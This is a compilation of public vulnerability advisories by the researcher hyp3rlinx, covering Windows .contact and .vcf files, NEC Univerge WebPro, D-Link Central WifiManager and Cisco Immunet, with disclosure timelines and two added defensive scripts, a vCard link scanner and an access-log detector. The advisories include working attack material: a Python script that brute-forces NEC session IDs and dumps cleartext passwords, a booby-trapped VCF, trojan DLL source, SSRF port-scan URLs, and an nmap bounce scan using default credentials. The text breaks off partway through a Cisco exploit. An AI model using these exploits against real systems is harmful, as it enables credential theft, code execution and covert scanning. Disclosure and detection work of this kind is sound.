[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591

[Vendor]
www.microsoft.com

[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.

[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution

[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files: the E-mail address field takes an expected E-mail address value, however the .CONTACT file is vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag, it will run that without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user.

The E-mail address's Mailto: will point to an arbitrary executable like:
p...@microsoft.com

Additionally, the executable file can live in a sub-directory and be referenced like "p...@microsoft.com", or attackers can use directory traversal techniques to point to malware sitting, say, in the target's Downloads directory like:
p...@microsoft.com

Making matters worse, if the files are compressed then downloaded, "mark of the web" (MOTW) may potentially not work as expected with certain archive utils.

This advisory was initially one of three different vulnerabilities I reported to the Zero Day Initiative Program (ZDI), which Microsoft decided not to release a security fix for and closed. The first cases I reported to ZDI were the .VCF and .CONTACT files' Website address input fields. This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known.

[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: field
p...@microsoft.com

Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click Yes.

Open the .CONTACT file and click the Mailto: link. BOOM! Windows calculator will execute.

Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :)

[POC Video URL]
https://vimeo.com/312824315

[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure: January 22, 2019
[FD] Microsoft Windows ".contact" File / Insufficient UI Warning Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.

[Vulnerability Type]
Insufficient UI Warning Arbitrary Code Execution

[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The flaw is due to the processing of the ".contact" file's node param, which takes an expected website value; however, if an attacker references an executable file it will run that without warning instead of performing the expected web navigation. This is dangerous and would be unexpected to an end user.

e.g. www.hyp3rlinx.altervista.com

Executable files can live in a sub-directory, so when the ".contact" website link is clicked it traverses directories towards the executable and runs. Making matters worse, if the files are compressed then downloaded, "mark of the web" (MOTW) may potentially not work as expected with certain archive utilities.

The ".\" chars allow directory traversal to occur in order to run the attacker-supplied executable sitting unseen in the attacker's directory.

This advisory is a duplicate of an issue that currently affects Windows .VCF files, and is released for the sake of completeness as it affects Windows .contact files as well.

[Exploit/POC]
Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name.
Create a directory to house the executable file.
Modify the contact file website link like ---> http.\\www..com
Contact website link now points at "dir .\ executable" ---> http.\\www..com
Compress the files using an archive utility and place on a webserver for download.

[POC Video URL]
https://vimeo.com/311759191

[Disclosure Timeline]
Reported to ZDI 2018-11-30
This exact same vulnerability exists and affects Microsoft Windows .VCF files, sharing the same root cause, and was publicly disclosed 2019-01-10.
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
Public disclosure: January 16, 2019
[FD] Microsoft VCF File Insufficient UI Warning Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI).

[Vulnerability Type]
Insufficient UI Warning Remote Code Execution

[CVE Reference]
ZDI-19-013
ZDI-CAN-6920

[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink. The user interface fails to provide any indication of the hazard. An attacker can leverage this vulnerability to execute code in the context of the current user.

[Exploit/POC]
1) Create a directory and name it "http"; this will house the .CPL executable file.

2) Create a .CPL file and give it a website name. I named mine "www.hyp3rlinx.altervista.cpl", or whatever website you wish, so it can be referenced in the VCF file.

#include <windows.h>

/* hyp3rlinx */
/* gcc -c -m32 hyp3rlinx.altervista.c
   gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o */

void ms_vcf_0day(){
    MessageBox(0, "Continue with install?", "TrickyDealC0der :)", MB_YESNO + MB_ICONQUESTION);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH: { ms_vcf_0day(); break; }
        case DLL_PROCESS_DETACH: { ms_vcf_0day(); break; }
        case DLL_THREAD_ATTACH:  { ms_vcf_0day(); break; }
        case DLL_THREAD_DETACH:  { ms_vcf_0day(); break; }
    }
    return TRUE;
}

3) Make sure to rename the executable's .DLL extension to a .CPL extension if you did not follow the compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl

4) Create a .VCF mail file. I named mine "trickyDealC0der.vcf". For the URL in the .VCF mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF file content: "trickyDealC0der.vcf"

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD

Now, open the "trickyDealC0der.vcf" file and click the website link; the VCF file will traverse back one to the "http" directory where our CPL executable file lives and KABOOM! :)

[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/

[Network Access]
Remote

[POC Video URL]
https://vimeo.com/310684003

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 - The vendor requested an additional file
10/03/18 - ZDI provided added files and a new PoC
10/03/18 - The vendor advised the report did not meet the bar for service
10/05/18 - ZDI advised that we believe the report is exploitable and notified the vendor of the intent to 0-day on 10/16/18
10/08/18 - The vendor advised ZDI they had re-considered a fix and requested an extension to 01/08/19
10/09/18 - ZDI agreed to the short extension
11/14/18 - The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 - The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that "engineering team had decided to pursue the fix as v.Next" and "Microsoft has decided that it will not be fixing this vulnerability and we are closing this case"
12/27/18 - ZDI notified the vendor of the intent to 0-day on 01/07/18
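The common thread of the three contact-file advisories above (.CONTACT mailto injection, .CONTACT website link, and this VCF link) is a link field whose value is really a relative path to an executable. The following scanner, added here as an example and not the author's or Microsoft's code, parses a vCard, handles RFC 6350 line folding, and reports URL/EMAIL values that carry path separators, HTML markup, a non-URL "scheme" such as http.\\, or an executable extension. The extension list extends the page's .EXE/.CPL/.COM/.VBS with a few other well-known types (my assumption).

```python
import re
from urllib.parse import urlparse

# Extensions the advisories name (.exe, .cpl, .com, .vbs) plus a few other
# well-known executable/script types (assumption, extend as needed).
EXEC_EXTS = {".exe", ".cpl", ".com", ".vbs", ".scr", ".bat", ".cmd", ".hta", ".dll"}
SCHEME_RE = re.compile(r"^(https?|ftp|mailto|tel):", re.I)   # "http.\\" does not match
EMAIL_RE = re.compile(r"^[^\s<>@\\/:]+@[^\s<>@\\/:]+$")
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.{1,2}([\\/]|$)")        # ".\", "..\", "./"


def _ext(component: str) -> str:
    component = component.split("?", 1)[0].split("#", 1)[0]
    dot = component.rfind(".")
    return component[dot:].lower() if dot >= 0 else ""


def link_findings(prop: str, value: str) -> list:
    """Reasons a URL or EMAIL property value looks like a local executable reference."""
    v = value.strip()
    reasons = []
    if "<" in v or re.search(r"href\s*=", v, re.I):
        reasons.append("HTML markup injected into the field")
    if "\\" in v or TRAVERSAL_RE.search(v):
        reasons.append("backslash or dot-segment path traversal")
    if prop == "EMAIL":
        if not EMAIL_RE.match(v):
            reasons.append("not a plain mailbox address")
        target = v
    elif SCHEME_RE.match(v):
        target = urlparse(v).path            # a real URL: only its path can name a file
    else:
        reasons.append("no recognised URL scheme ('http.\\\\' is a path, not 'http://')")
        target = v
    ext = _ext(re.split(r"[\\/]", target)[-1])
    # .com is both a TLD and an executable extension, so for an EMAIL value it is
    # only reported when something else about the value is already suspicious.
    if ext in EXEC_EXTS and (prop == "URL" or reasons):
        reasons.append("final path component has executable extension " + ext)
    return reasons


def scan_vcard(text: str) -> list:
    """Return (property, value, reasons) for suspicious URL/EMAIL lines in a vCard."""
    unfolded = re.sub(r"\r?\n[ \t]", "", text)      # RFC 6350 line folding
    findings = []
    for line in unfolded.splitlines():
        if ":" not in line:
            continue
        head, value = line.split(":", 1)
        prop = head.split(";", 1)[0].strip().upper()  # "URL;TYPE=home;PREF=1" -> "URL"
        if prop in ("URL", "EMAIL"):
            reasons = link_findings(prop, value)
            if reasons:
                findings.append((prop, value.strip(), reasons))
    return findings


# Sample cards: the first repeats the advisory's "trickyDealC0der.vcf" link,
# the second is a constructed benign card with a folded URL line.
MALICIOUS_VCF = r"""BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD
"""
BENIGN_VCF = """BEGIN:VCARD
VERSION:4.0
FN:Jane Example
EMAIL;TYPE=work:jane@example.com
URL;TYPE=work:https://www.example.com/
 team/jane
END:VCARD
"""

if __name__ == "__main__":
    for label, card in (("malicious", MALICIOUS_VCF), ("benign", BENIGN_VCF)):
        print(label, scan_vcard(card))
```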
[FD] CVE-2018-11741 / CVE-2018-11742 / NEC Univerge Sv9100 WebPro - 6.00 / Predictable Session ID / Clear Text Password Storage
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec

***Greetz: indoushka | Eduardo B. 0day***

[Vendor]
www.necam.com

[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00

NEC Univerge WebPro is a web-based programming tool for the NEC Switch, which is used to program corporate telephone systems.

Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797

[Vulnerability Type(s)] / [CVE Reference(s)]
Predictable Session ID - CVE-2018-11741
Cleartext Password Storage - CVE-2018-11742

[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated sessionId.

Security Issue:
NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information, including passwords stored in clear text in the Web UI. Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.

e.g.
curl http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8)

Exploit/POC:

from socket import *
import re

#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in Administrator 'Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8)
#"GOTO(8)" will retrieve all account usernames and cleartext passwords.

print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"

IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False

#check application is NEC and vuln version
def is_NEC_webpro(u):
    global tmp,tmp2,cnt
    res=''
    cnt+=1
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((IP,80))
    s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
    while True:
        res=s.recv(4048)
        if res.find('')!=-1:
            break
    s.close()
    if re.findall(r"\bWebPro\b", res):
        tmp=True
    if tmp and cnt < 3:
        is_NEC_webpro('/Login.htm')
    if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
        tmp2 = True
    if tmp == True and tmp2 == True:
        return True
    return False

def dump(acct):
    file=open('NEC-Accounts.txt', 'w')
    file.write(acct+'\n')
    file.close()

def breach(sid):
    global pwned
    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((IP,80))
        sid=str(sid)
        print 'trying sessid '+sid
        s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
    except Exception as e:
        print str(e)
    while True:
        res = s.recv(4096)
        if res.find('')!=-1:
            break
    if re.findall(r"\bProgramming Password Setup\b",res)!=-1:
        ## We hit an active session.
        dump(res)
        print res
        pwned=True
    s.close()
    return pwned

def sessgen():
    for sessid in range(1000,15000): ##test 14109
        if breach(sessid):
            break

if __name__=='__main__':
    if is_NEC_webpro('/'):
        sessgen()
    else:
        print 'Not NEC or version not vuln.'

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: May 15, 2018 - No reply
Vendor Notification: May 18, 2018 - No reply
Vendor Notification: June 4, 2018 - No reply
Mitre assigns CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC: June 7, 2018
Request status: August 11, 2018
JPCERT contacts NEC: August 14, 2018 - No reply from vendor
Request status: August 21, 2018
JPCERT again contacts NEC: August 21, 2018
JPCERT "vendor working on a release": August 23, 2018
JPCERT "Vendor release October 2018": September 12, 2018
NEC "Requests public disclosure after December 1st.": November 19, 2018
December 2, 2018: Public Disclosure
[FD] CVE-2018-15515 / D-LINK Central WifiManager CWM-100 / Trojan File SYSTEM Privilege Escalation
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec

***Greetz: indoushka | Eduardo B.***

[Vendor]
us.dlink.com

[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.

[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation

[Affected Component]
"quserex.dll"

[CVE Reference]
CVE-2018-15515

[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.

[Impact]
Code Execution as SYSTEM

[Exploit/POC]
1) Create a 32-bit DLL named "quserex.dll" and place it in the "CaptivelPortal.exe" directory under the DLINK directory
2) Restart the service "CaptivelPortal"
3) Proof: examine using Process Monitor (Sysinternals)

#include <windows.h>

/* hyp3rlinx */
/* gcc -c -m32 quserex.c
   gcc -shared -m32 -o quserex.dll quserex.o */

void executo(){
    MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH: { executo(); break; }
        case DLL_PROCESS_DETACH: { executo(); break; }
        case DLL_THREAD_ATTACH:  { executo(); break; }
        case DLL_THREAD_DETACH:  { executo(); break; }
    }
    return TRUE;
}

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018 - No reply from vendor
Request update: September 6, 2018
Vendor: "R&D has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 10'2018."
Request update: October 16, 2018 - No reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018 - No reply from vendor
November 8, 2018 : Public Disclosure
[FD] CVE-2018-15517 / D-LINK Central WifiManager CWM-100 / Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec

***Greetz: indoushka | Eduardo B.***

[Vendor]
us.dlink.com

[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.

[Vulnerability Type]
Server Side Request Forgery

[Affected Component]
MailConnect

[CVE Reference]
CVE-2018-15517

[Security Issue]
Using a web browser or script, SSRF can be initiated against internal/external systems to conduct port scans by leveraging D-LINK's MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.

This can undermine accountability of where scans or connections actually came from and/or bypass the FW etc. This can be automated via script or using a web browser.

[Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/
reply: OK

Scan internal port 22 SSH:
https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018 - No reply from vendor
Request update: September 6, 2018
Vendor: "R&D has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 10'2018."
Request update: October 16, 2018 - No reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018 - No reply from vendor
November 8, 2018 : Public Disclosure
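Both the NEC WebPro session-ID enumeration (CVE-2018-11741, above) and the CWM-100 MailConnect SSRF leave a characteristic trail in HTTP access logs: one source walking near-consecutive sessionId values, or one source hitting MailConnect with many ports or an internal address. The detector below is an added example, not the author's or either vendor's code; it assumes Combined Log Format lines as a reverse proxy or WAF in front of the device would write them (the sample lines are constructed, and the third one uses the exact "sessionId%3d...&GOTO(8)%20HTTP/1.1" encoding the NEC PoC sends).

```python
import re
import ipaddress
from collections import defaultdict

# Combined Log Format as written by a proxy/WAF in front of the device (assumption).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# NEC WebPro: /Home.htm?sessionId=<n>&GOTO(8); the PoC URL-encodes '=' as %3d.
SESSION_RE = re.compile(r"/Home\.htm\?(?:.*&)?sessionId(?:=|%3d)(\d+)", re.I)
# D-Link CWM-100: /index.php/System/MailConnect/host/<host>/port/<port>/secure/
MAILCONNECT_RE = re.compile(r"/System/MailConnect/host/(?P<host>[^/]+)/port/(?P<port>\d+)", re.I)

# Constructed sample log: one enumerating source, one legitimate WebPro user,
# one MailConnect port sweep of loopback, one legitimate MailConnect check.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2018:10:00:01 +0000] "GET /Home.htm?sessionId=12957&GOTO(8) HTTP/1.1" 200 512
10.0.0.5 - - [01/Dec/2018:10:00:01 +0000] "GET /Home.htm?sessionId=12958&GOTO(8) HTTP/1.1" 200 512
10.0.0.5 - - [01/Dec/2018:10:00:02 +0000] "GET /Home.htm?sessionId%3d12959&GOTO(8)%20HTTP/1.1 HTTP/1.1" 200 9120
10.0.0.8 - - [01/Dec/2018:10:00:30 +0000] "GET /Home.htm?sessionId=14109&GOTO(1) HTTP/1.1" 200 700
10.0.0.7 - - [01/Dec/2018:10:01:00 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ HTTP/1.1" 200 2
10.0.0.7 - - [01/Dec/2018:10:01:01 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/23/secure/ HTTP/1.1" 200 2
10.0.0.7 - - [01/Dec/2018:10:01:01 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/445/secure/ HTTP/1.1" 200 2
10.0.0.9 - - [01/Dec/2018:10:02:00 +0000] "GET /index.php/System/MailConnect/host/mail.example.com/port/587/secure/ HTTP/1.1" 200 2
""".splitlines()


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_session_probing(lines, min_requests=3, max_gap=2):
    """Sources walking /Home.htm?sessionId=N with near-consecutive N values."""
    ids = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        m = SESSION_RE.search(rec["path"]) if rec else None
        if m:
            ids[rec["src"]].append(int(m.group(1)))
    alerts = []
    for src, seen in ids.items():
        ordered = sorted(set(seen))
        gaps = [b - a for a, b in zip(ordered, ordered[1:])]
        if len(seen) >= min_requests and gaps and max(gaps) <= max_gap:
            alerts.append({"src": src, "kind": "sessionId enumeration",
                           "count": len(seen), "range": (ordered[0], ordered[-1])})
    return alerts


def detect_mailconnect_abuse(lines, min_ports=3):
    """Sources sweeping ports, or reaching internal addresses, through MailConnect."""
    ports_by_target = defaultdict(set)
    internal = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        m = MAILCONNECT_RE.search(rec["path"]) if rec else None
        if not m:
            continue
        host, port = m.group("host"), int(m.group("port"))
        ports_by_target[(rec["src"], host)].add(port)
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:          # a hostname: cannot classify without resolving it
            continue
        if addr.is_loopback or addr.is_private or addr.is_link_local:
            internal[rec["src"]].add((host, port))
    alerts = []
    for (src, host), ports in ports_by_target.items():
        if len(ports) >= min_ports:
            alerts.append({"src": src, "kind": "MailConnect port sweep",
                           "host": host, "ports": sorted(ports)})
    for src, pairs in internal.items():
        alerts.append({"src": src, "kind": "MailConnect to internal address",
                       "targets": sorted(pairs)})
    return alerts


if __name__ == "__main__":
    for alert in detect_session_probing(SAMPLE_LOG) + detect_mailconnect_abuse(SAMPLE_LOG):
        print(alert)
```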
[FD] CVE-2018-15516 / D-LINK Central WifiManager CWM-100 / FTP Server PORT Bounce Scan
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt
[+] ISR: ApparitionSec

***Greetz: indoushka | Eduardo B.***

[Vendor]
us.dlink.com

[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.

[Vulnerability Type]
FTP Server PORT Bounce Scan

[CVE Reference]
CVE-2018-15516

[Security Issue]
The FTP Server component of the D-LINK Central WifiManager can be used as a man-in-the-middle machine allowing PORT command bounce scan attacks. This vulnerability allows remote attackers to abuse your network and discreetly conduct network port scanning. Victims will then think these scans are originating from the D-LINK network running the afflicted FTP Server and not from you.

[Exploit/POC]
D-LINK CWM-100 FTP Server listens on port 9000 (default); default creds are "admin" "admin"

nmap -v -b admin:admin@VICTIM-IP:9000 -p 21,22,23,53,445

[POC Video URL]
https://vimeo.com/299797225

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018 - No reply from vendor
Request update: September 6, 2018
Vendor: "R&D has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 10'2018."
Request update: October 16, 2018 - No reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018 - No reply from vendor
November 8, 2018 : Public Disclosure
[FD] CVE-2018-15437 / Cisco Immunet and Cisco AMP for Endpoints / System Scan Denial of Service
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] www.cisco.com [Multiple Products] Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0 Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine. The software is complementary with existing antivirus software. Cisco AMP (Advanced Malware Protection) Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack. [Vulnerability Type] System Scan Denial of Service [CVE Reference] CVE-2018-15437 Cisco Advisory ID: cisco-sa-20181107-imm-dos Cisco Bug ID: CSCvk70945 Cisco Bug ID: CSCvn05551 CVSS Score: Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X [Security Issue] A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on Microsoft Windows could allow a local attacker to disable the scanning functionality of the product. This could allow executable files to be launched on the system without being analyzed for threats. The vulnerability is due to improper process resource handling. An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or Cisco AMP for Endpoints and executing a malicious file. A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from being protected from further intrusion. There are no workarounds that address this vulnerability. Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs. 
The affected end user will get a pop-up warning box when attempting to perform a file or system scan:

"You Can Not Scan at This Time"
"The Immunet service is not running. Please restart the service and retry."

Below I provide details to exploit Cisco Immunet; however, "Cisco AMP For Endpoints" is also affected, so the exploit can easily be ported.

[References]
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos

[Vulnerability Details]
Pipe is remotely accessible: PIPE_REJECT_REMOTE_CLIENTS not present.
FILE_FLAG_FIRST_PIPE_INSTANCE not present.
Max Pipe Instances = FF (255)

loc_140028140:
lea     rax, [rbp+57h+pSecurityDescriptor]
mov     [rbp+57h+SecurityAttributes.nLength], 18h
mov     edx, 1                                          ; dwRevision
mov     [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax
lea     rcx, [rbp+57h+pSecurityDescriptor]              ; pSecurityDescriptor
mov     [rbp+57h+SecurityAttributes.bInheritHandle], 1
call    cs:InitializeSecurityDescriptor
xor     r9d, r9d                                        ; bDaclDefaulted
lea     rcx, [rbp+57h+pSecurityDescriptor]              ; pSecurityDescriptor
xor     r8d, r8d                                        ; pDacl
lea     edx, [r9+1]                                     ; bDaclPresent
call    cs:SetSecurityDescriptorDacl
mov     rcx, [rdi+18h]                                  ; lpName
lea     rax, [rbp+57h+SecurityAttributes]
mov     [rsp+100h+lpSecurityAttributes], rax            ; lpSecurityAttributes
mov     edx, 4003h                                      ; dwOpenMode
mov     [rsp+100h+nDefaultTimeOut], esi                 ; nDefaultTimeOut
mov     r9d, 0FFh                                       ; nMaxInstances
mov     [rsp+100h+nInBufferSize], 2000h                 ; nInBufferSize
mov     r8d, 6                                          ; dwPipeMode
mov     [rsp+100h+nOutBufferSize], 2000h                ; nOutBufferSize
call    cs:CreateNamedPipeW
mov     [rdi+8], rax
call    cs:GetLastError
test    eax, eax
jz      short loc_140028203

[Exploit/POC]
"Cisco-Immunet-Exploit.c"

#include <windows.h>
#include <stdio.h>

#define pipename "\\\\.\\pipe\\IMMUNET_SCAN"

/* Discovered by hyp3rlinx CVE-2018-15437 */

int main(void) {
